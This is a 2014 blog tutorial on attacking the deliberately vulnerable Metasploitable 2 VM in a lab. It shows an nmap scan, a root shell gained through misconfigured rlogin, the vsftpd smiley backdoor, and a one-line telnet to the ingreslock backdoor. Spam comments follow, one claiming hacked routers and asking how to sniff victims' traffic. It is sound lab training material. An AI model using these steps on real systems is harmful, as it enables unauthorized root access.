Thursday, May 1, 2014

Metasploitable 2 : Vulnerability assessment and Remote Login

By Shashwat May 01, 2014 , , , , , , , , ,
  • Disclaimer - TLDR; some stuff here can be used to carry out illegal activity, our intention is, however, to educate
If you've followed my previous tutorial on Introduction to Metasploitable 2, then you should be sitting here with Kali Linux and Metasploitable 2 up and running. So, I'm gonna skip the formalities and move right ahead.


Portscan

On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP address. This will give you an idea of what the ip of your target machine could be. In my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To scan all ports in that range, you can use Nmap scan. Here is what it should look like.
nmap -sS 192.168.154.0/24




The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. Also, it has a huge lot of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the metasploitable machine, after logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever may be your case).

Vulnerabilities

Now the Metasploitable 2 operating system has been loaded with a large number of vulnerabilites. There are the following kinds of vulnerabilities in Metasploitable 2-
  1. Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system.
  2. Backdoors - A few programs and services have been backdoored. These backdoors can be used to gain access to the OS.
  3. Weak Passwords - These are vulnerable to bruteforce attacks.
  4. Vulnerable Web Services- A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited.
  5. Web Application Vulnerabilities - Some vulnerable web applications can be exploited to gain entry to the system.
There is a very resourceful article about many vulnerabilities on Rapid7 website.

Exploiting The Vulnerabilities

Remote access vulnerability - Rlogin

Remember the list of open ports which you came up across during the port scan? The 512,513 and 514 ports are there for remotely accessing Unix machines. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. This vulnerability is easy to exploit. We will use rlogin to remotely login to Metasploitable 2. Type rlogin to see the details about the command structure.


root@kali:~# rlogin
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
           [-D [bind_address:]port] [-e escape_char] [-F configfile]
           [-I pkcs11] [-i identity_file]
           [-L [bind_address:]port:host:hostport]
           [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
           [-R [bind_address:]port:host:hostport] [-S ctl_path]
           [-W host:port] [-w local_tun[:remote_tun]]
           [user@]hostname [command] 
 
rlogin -l root 192.168.154.132
Most probably you will get something like this-

root@kali:~# rlogin -l root 192.168.154.132
The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.
RSA key fingerprint is *****.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.154.132' (RSA) to the list of known hosts.
root@192.168.154.132's password: 

As you can see, it is asking for a password. It's not because the target is not vulnerable. It's because we don't have ssh-client installed on Kali Linux. The rsh-client is a remote login utility that it will allow users to connect to remote machines.
apt-get install rsh-client
This will start the installation progress, you'll have to type yes once or twice, Kali will do the rest for you. After the installation is successful, you should try your previous command again. This time around, things will be better.



root@kali:~# rlogin -l root 192.168.154.132
Last login: Thu May  1 11:34:55 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# 

Now you have an administrator privilege shell on Metasploitable 2. That was as easy as typing one line. (and installing an application). We have one more such vulnerability that can be exploited easily.

Telnet Vulnerability

Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a popular FTP server. The version that is installed on Metasploit contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley), the backdoored version will open a listening shell on port 6200. This means anyone can login to a computer without knowing the credentials, just use :). This can be exploited using Metasploit. We will cover this in the next tutorial. Till then something for your appetite-
telnet 192.168.99.131 1524
This is a another one line exploit, on the 1524 ingreslock port (see portscan result). I will post more stuff soon, but this is all for now.
Share with your friends
Posted by at
Labels: , , , , , , , , ,

45 comments:

  1. Matthew BarnardJuly 30, 2014 at 7:05 PM

    Hi, found something to add.
    Users need to set their VM internet connection as "VM" to scan ports. Otherwise the ifconfig will not provide correct IP.

    ReplyDelete
    Replies
    1. Shashwat ChaudharyJuly 30, 2014 at 10:14 PM

      Please elaborate. I didn't get you. Are you talking about the port-scan step?

      Delete
    2. Karen MoonFebruary 10, 2022 at 12:48 AM

      Hope it works.

      Delete
  2. AnonymousApril 9, 2015 at 6:43 AM

    Hi , i have hacked some routers (TP_Link and D_Link)...so i have full-complete access
    to the victim's router web interface....( my OS=Kali ) ....is there any way to sniff PC data traffic behind NAT???((except DNS Spoofing))......

    ReplyDelete
    Replies
    1. Slava KnyazevAugust 27, 2016 at 11:49 PM

      Web Interface is nice but yields little. You need to gain root access if you want to get anywhere,

      Delete
  3. emilyanncrJuly 7, 2015 at 12:12 PM

    Nice job. Thank you

    ReplyDelete
  4. emilyanncrJuly 7, 2015 at 12:13 PM

    where can i find the rest of your tutorials on this?

    ReplyDelete
  5. AnonymousJuly 8, 2015 at 11:13 AM

    hii
    first amazing site love it
    and second i cant find any ports .
    my lp run kali and my pc run VM Metasploitable2
    i use nmap and get this >>>>
    note : host seems down , if it is really up , but blocking our ping probes , try -Pn ( i try it not working too)
    nmap done : 1 IP Address ( 0 host up ) .
    what i need to do ?
    thanks .

    ReplyDelete
    Replies
    1. UnknownSeptember 6, 2015 at 2:46 PM

      you must ensure your metasploitable is up and running when scanning

      Delete
  6. UnknownSeptember 6, 2015 at 2:45 PM

    Your metasploitable2 must be up and running when you are testing

    ReplyDelete
  7. AnonymousFebruary 18, 2016 at 8:01 AM

    scanning with nmap shows all ports are filtered. what should i do?

    ReplyDelete
    Replies
    1. AnonymousOctober 13, 2016 at 12:32 AM

      turn off the firewall, or slow down the scan so firewall doesn't detect it. Also experiment with scan types

      Delete
  8. UnknownNovember 10, 2016 at 1:57 PM

    Hi,

    I followed up to the step where you download the RSH client. I am using a Kali VM and Metasploitable VM at the same time. For some reason when I try to remote login to Metasploitable now I get rlogind: Permission denied. Can you possibly help me out with this? I have been stuck for two days!

    ReplyDelete
  9. AnonymousApril 24, 2017 at 11:08 PM

    hi
    i am using windows 10 and i have installed metasploitable in virtual box. so how will i use metasploit in metasploitable

    ReplyDelete
    Replies
    1. UnknownApril 27, 2017 at 12:44 AM

      Follow this guide for setup your Pentest lab: https://www.hackingloops.com/kali-linux-virtualbox-pentest-lab/

      Delete
  10. faizanDecember 30, 2020 at 2:44 AM

    I think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article. GRC

    ReplyDelete
  11. vé máy bay từ canada về việt namAugust 1, 2021 at 7:38 PM

    Liên hệ Aivivu, đặt vé máy bay tham khảo

    kinh nghiệm mua vé máy bay đi Mỹ giá rẻ

    mua vé máy bay từ mỹ về việt nam

    mua vé máy bay từ nhật bản về việt nam

    giá vé máy bay từ đức về việt nam

    giá vé máy bay từ Vancouver về việt nam

    vé máy bay từ hàn về Việt Nam

    khách sạn cách ly ở vân đồn

    ReplyDelete
  12. BextolAugust 19, 2021 at 10:49 AM

    A residence permit for spouses and minor children can be obtained together with the main investor. The procedure for obtaining a temporary residence permit takes 1 to 3 months. https://www.baltic-legal.com/legal-services-eng.htm

    ReplyDelete
  13. mubeenfaisalAugust 20, 2021 at 11:59 PM

    You know your projects stand out of the herd. There is something special about them. It seems to me all of them are really brilliant! virtual assessment centre

    ReplyDelete
  14. Files Mama (filesmama.com)March 6, 2023 at 1:09 AM

    Windows 11 Activator is one of the best activator available on filesmama.

    ReplyDelete
  15. valentinaOctober 5, 2023 at 12:37 AM

    Traffic Lawyer Greensville VAThe way you describing is awesome.Keep on sharing more.

    ReplyDelete
  16. melanie raoFebruary 1, 2024 at 10:25 AM

    Metasploitable 2, an intentionally vulnerable virtual machine designed for training and educational purposes, serves as a crucial tool for cybersecurity professionals and enthusiasts aiming to practice vulnerability assessment and penetration testing skills. This platform exposes users to a wide range of vulnerabilities that mirror real-world weaknesses found in poorly secured systems, offering a hands-on experience in identifying and exploiting these flaws. Through the use of tools and techniques for vulnerability assessment, individuals can uncover weaknesses in services such as FTP, SSH, and web applications running on Metasploitable 2. Furthermore, it facilitates the practice of remote login exploitation, allowing users to hone their skills in gaining unauthorized access to systems via network services. Engaging with Metasploitable 2 not only enhances technical proficiency in a safe and controlled environment but also deepens the understanding of the importance of robust cybersecurity measures and the potential consequences of neglecting system security.
    motorcycle accident injury attorney

    ReplyDelete
  17. jameshFebruary 20, 2024 at 10:29 AM


    Kali Tutorials refers to instructional materials, guides, or resources designed to educate users on how to use Kali Linux, a popular distribution of Linux specifically tailored for penetration testing and cybersecurity tasks. These tutorials typically cover various aspects of Kali Linux, including installation, configuration, basic commands, and advanced techniques for conducting security assessments and ethical hacking. Kali Tutorials aim to provide users with practical knowledge and skills to effectively utilize Kali Linux for testing and securing computer systems and networks.
    Fairfax Divorce Lawyer
    Divorce Lawyers Fairfax VA




    ReplyDelete
  18. Reckless Driving Attorney In New JerseyApril 3, 2024 at 12:47 AM

    A Reckless Driving Attorney In New Jersey can help defend you against charges, protect your rights, and minimize penalties associated with reckless driving violations in the state.

    ReplyDelete
  19. Kenya eTA for Sweden CitizensJune 11, 2024 at 2:39 AM

    Your blog continues to inspire and enlighten me. Your adept handling of complex topics with finesse and clarity is truly remarkable. The recent post was exceptionally well-articulated, offering valuable insights that broadened my horizons. Your talent for engaging readers and making learning enjoyable is a rare quality. Thank you for your unwavering commitment and dedication – it doesn't go unnoticed!

    ReplyDelete
  20. 5 year Indian visa for UK citizensJune 11, 2024 at 9:53 PM

    This article offers a unique take on a subject often left unexplored. The author's insights shed new light on familiar concepts, skillfully weaving together diverse ideas into a cohesive narrative. It's clear that considerable thought and expertise were poured into crafting this compelling piece. I'm excited to explore more of the content produced by this insightful writer

    ReplyDelete
    Replies
    1. ssoJune 13, 2024 at 1:39 AM

      This article provides a refreshing perspective on a commonly discussed topic. The author's insightful approach and skillful synthesis of ideas create a compelling read. I look forward to delving deeper into more of their thought-provoking content.

      Delete
  21. Egypt Visa for Brazil CitizensJune 18, 2024 at 11:01 PM

    Stumbling upon this post feels like uncovering a hidden gem within daily interactions. The author skillfully captures the spirit of our time, expressing universal human experiences with profound clarity and empathy. Each sentence resonates deeply, encouraging introspection and mutual understanding. We truly value this insightful and thought-provoking contribution.

    ReplyDelete
  22. How much does a Benin visa cost?June 21, 2024 at 10:06 PM

    Your blog post was fantastic! The way you communicate complex ideas with such clarity and enthusiasm is impressive. I always learn something new from your posts, and this one was no exception. Thank you for sharing your insights and for making your blog such an enjoyable and informative read.

    ReplyDelete
  23. Birthday WishesJuly 3, 2024 at 2:12 AM

    Happy Birthday Wishes
    ! May your wonderful day be filled with pleasure, laughter, and everything you enjoy. I wish you another year of health, happiness, and prosperity. Enjoy every moment and create lasting memories. Here's to celebrating you and all that makes you special. Cheers!

    ReplyDelete
  24. ISO Certification Saudi ArabiaJuly 26, 2024 at 12:19 AM

    This article is too good not to share! My friends and colleagues need to see the fantastic information it contains.

    Visit our link for ISO Certification in Riyadh

    ReplyDelete
  25. lordeAugust 27, 2024 at 7:39 PM

    The Geometry Dash game uses simple controls—just tap the screen or click the mouse to make your character jump. Timing is everything, as you need to avoid spikes, gaps, and other hazards.

    ReplyDelete
  26. SSO PORTALSeptember 3, 2024 at 12:33 AM

    The primary advantage of using an SSO ID is convenience. Instead of juggling multiple usernames and passwords for different platforms, you only need to remember one. This not only makes logging in faster and easier but also reduces the risk of security breaches. With fewer passwords to remember, you're less likely to write them down or use weak passwords, both of which can compromise security.

    SSO IDs also simplify the management of user access for organizations. IT administrators can easily control and monitor access to various services, ensuring that employees or students have the appropriate level of access based on their role or status.

    ReplyDelete
  27. ISO Certification In PhilippinesSeptember 26, 2024 at 4:01 AM

    This detailed analysis of Metasploitable 2 vulnerabilities is incredibly insightful! It’s a fantastic resource for anyone looking to enhance their cybersecurity skills. Visit our Website ISO Certification In Philippines


    ReplyDelete
  28. Ellie ChamberlaynOctober 17, 2024 at 4:13 AM

    Metasploitable is a treasure trove for cybersecurity enthusiasts! This intentionally vulnerable Linux distribution offers hands-on experience in penetration testing and vulnerability assessment. Dive into its myriad of challenges to sharpen your skills and explore the exciting world of ethical hacking. A must-try for anyone serious about security!

    ReplyDelete
  29. Prevención Violencia Doméstica Acto Nueva JerseyNovember 9, 2024 at 6:21 AM

    Metasploitable 2 provides a valuable environment for practicing vulnerability assessments and remote login techniques. It allows users to explore common security flaws in a controlled setting, helping to build skills in identifying weaknesses and exploiting them. However, it is crucial to approach the practice ethically and within legal boundaries.

    ReplyDelete
  30. Lily IslaDecember 24, 2024 at 12:55 AM

    For individuals and businesses alike, the mailbox service in Oshawa is a game-changer. With a secure and private mailbox, you can receive packages and mail safely and conveniently. It’s the ideal solution for anyone looking to enhance their privacy or ensure timely delivery of important documents. 🔒

    ReplyDelete
  31. AnthonyJanuary 24, 2025 at 4:54 AM

    For those navigating the difficulties of divorce processes, McLean, Virginia divorce attorneys provide knowledgeable legal advice. These skilled lawyers help clients understand their rights and options while offering them sympathetic support. They help with prenuptial agreements, alimony, property distribution, child custody, and other divorce-related issues. In order to achieve just and equitable results, McLean divorce attorneys concentrate on providing individualized solutions that are catered to each client's particular situation. Divorce lawyers mclean va , Their objective is to reduce dispute and provide a seamless process during a trying and emotional period. Throughout the divorce process, clients can depend on their experience for efficient legal assistance.

    ReplyDelete
  32. EdwardsFebruary 6, 2025 at 12:52 AM

    The app is made for Android users and works smoothly on various devices, including smartphones and tablets. You can watch your favorite content on the go or on a bigger screen.

    ReplyDelete
  33. BaileyFebruary 7, 2025 at 1:21 PM

    MotoX3M has realistic and fun physics that make the bike handling feel natural. When you jump, land, or do stunts, the bike’s movements feel realistic, adding a sense of thrill and excitement to each level.

    ReplyDelete
  34. тик ток модFebruary 10, 2025 at 1:51 AM

    тик ток мод Is a global stage for sharing your talents, ideas, and humor in short videos.

    ReplyDelete
  35. tiressFebruary 10, 2025 at 6:00 AM

    "Jojoy is the best place to get modded apps and games with premium features unlocked."

    ReplyDelete
  36. LawrenceFebruary 13, 2025 at 4:39 AM

    Nulls Brawls — это динамичная мобильная игра, где игроки сражаются в режиме реального времени, используя уникальных персонажей и тактики для победы в захватывающих боях.

    ReplyDelete
  37. HubbardFebruary 13, 2025 at 4:40 AM

    FreefireMax is an upgraded version of Free Fire with better graphics, smoother gameplay, and enhanced effects. It offers the same battle royale fun but with improved visuals and performance.

    ReplyDelete
  38. brawl stars pcMarch 8, 2025 at 10:21 AM

    Brawl Stars is a thrilling mobile game where players battle in real-time. Choose your brawler, team up with friends, and fight in exciting 3v3 matches. Collect rewards, unlock new characters, and level up your brawlers.

    ReplyDelete

Subscribe to: Post Comments (Atom)
© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.